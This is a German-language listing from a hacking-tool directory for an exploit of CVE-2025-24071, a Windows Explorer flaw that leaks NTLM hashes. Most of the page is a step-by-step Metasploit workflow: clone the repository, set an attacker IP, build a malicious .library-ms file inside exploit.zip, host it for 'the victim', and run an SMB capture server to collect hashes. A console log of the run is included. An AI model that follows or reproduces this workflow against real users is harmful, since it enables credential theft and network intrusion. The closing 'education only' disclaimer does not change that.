Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Blackash-CVE-2025-24071 — CVE-2025-24071 | Kitploit
Tools/GitHubGitHub/zbs54/blackash-cve-2025-24071
Exploit-FrameworksPayload-GenerierungSchwachstellenanalyseExploitationInformationsbeschaffungPenetrationstests
GitHubzbs54/blackash-cve-2025-24071

Blackash-CVE-2025-24071

CVE-2025-24071

Repository anzeigen
vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Blackash-CVE-2025-24071

CVE-2025-24071: NTLM-Hash-Leck durch .library-ms-Datei, Metasploit-Modul 🚨

Beschreibung

Die Offenlegung vertraulicher Informationen gegenüber einem unbefugten Akteur im Windows-Datei-Explorer ermöglicht es einem unbefugten Angreifer, Spoofing über ein Netzwerk durchzuführen.

Metriken

CNA: Microsoft Corporation Basisbewertung: 6.5 MITTEL 🟠 Vektor: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N

Überblick

Die Sicherheitslücke tritt auf, wenn ein Benutzer ein ZIP-Archiv mit einer speziell präparierten .library-ms-Datei extrahiert. Der Windows-Explorer initiiert automatisch eine SMB-Authentifizierungsanfrage an einen in der Datei angegebenen Remote-Server, wodurch der NTLM-Hash des Benutzers ohne Benutzerinteraktion preisgegeben wird.

Dieses Metasploit-Modul:

  1. Erstellt eine schädliche .library-ms-Datei.
  2. Packt sie in ein ZIP-Archiv.
  3. Integriert die SMB-Erfassungsfunktionalität von Metasploit, um NTLM-Hashes zu sammeln.
root@kitploit:~
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMM                MMMMMMMMMM
MMMN$                           vMMMM
MMMNl  MMMMM             MMMMM  JMMMM
MMMNl  MMMMMMMN       NMMMMMMM  JMMMM
MMMNl  MMMMMMMMMNmmmNMMMMMMMMM  JMMMM
MMMNI  MMMMMMMMMMMMMMMMMMMMMMM  jMMMM
MMMNI  MMMMMMMMMMMMMMMMMMMMMMM  jMMMM
MMMNI  MMMMM   MMMMMMM   MMMMM  jMMMM
MMMNI  MMMMM   MMMMMMM   MMMMM  jMMMM
MMMNI  MMMNM   MMMMMMM   MMMMM  jMMMM
MMMNI  WMMMM   MMMMMMM   MMMM#  JMMMM
MMMMR  ?MMNM             MMMMM .dMMMM
MMMMNm `?MMM             MMMM` dMMMMM
MMMMMMN  ?MM             MM?  NMMMMMN
MMMMMMMMNe                 JMMMMMNMMM
MMMMMMMMMMNm,            eMMMMMNMMNMM
MMMMNNMNMMMMMNx        MMMMMMNMMNMMNM
MMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM
        https://metasploit.com


       =[ metasploit v6.4.64-dev                          ]
+ -- --=[ 2519 exploits - 1296 auxiliary - 431 post       ]
+ -- --=[ 1616 payloads - 49 encoders - 13 nops           ]
+ -- --=[ 9 evasion                                       ]

Metasploit Documentation: https://docs.metasploit.com/

msf6 > use auxiliary/server/ntlm_hash_leak
msf6 auxiliary(server/ntlm_hash_leak) > set ATTACKER_IP 192.168.1.1
ATTACKER_IP => 192.168.1.1
msf6 auxiliary(server/ntlm_hash_leak) > set FILNAME exploit.zip
FILNAME => exploit.zip
msf6 auxiliary(server/ntlm_hash_leak) > set LIBRARY_NAME malicious.library-ms
LIBRARY_NAME => malicious.library-ms
msf6 auxiliary(server/ntlm_hash_leak) > set SHARE_NAME shared
set SHARE_NAME => shared
msf6 auxiliary(server/ntlm_hash_leak) > run
[*] Malicious ZIP file created: exploit.zip
[*] Host the file and wait for the victim to extract it.
[*] Ensure you have an SMB capture server running to collect NTLM hashes.
[*] Auxiliary module execution completed

Installation

  1. Klonen Sie das Repository:
root@kitploit:~
git clone https://github.com/B1ack4sh/Blackash-CVE-2025-24071.git
cd CVE-2025-24071

Verwendung

  1. Laden Sie das Modul:
root@kitploit:~
use auxiliary/server/ntlm_hash_leak
  1. Legen Sie die erforderlichen Optionen fest:
root@kitploit:~
set ATTACKER_IP 192.168.1.162           # Replace with your IP address
set FILENAME exploit.zip                # Name of the malicious ZIP file
set LIBRARY_NAME malicious.library-ms   # Name of the .library-ms file
set SHARE_NAME shared                   # SMB share name
  1. Führen Sie das Modul aus:
root@kitploit:~
run
  1. Das Modul erstellt eine schädliche ZIP-Datei (exploit.zip). Hosten Sie diese Datei, damit das Opfer sie herunterladen und extrahieren kann.
  2. Verwenden Sie das SMB-Erfassungsmodul von Metasploit, um NTLM-Hashes zu sammeln:
root@kitploit:~
use auxiliary/server/capture/smb
set SRVHOST 192.168.1.162  # Same as ATTACKER_IP
run

Haftungsausschluss ⚠️

Nur für Bildungs- und Forschungszwecke. Verwenden Sie es nur gegen Systeme, die Ihnen gehören oder für die Sie die Erlaubnis zum Testen haben.

Tool herunterladen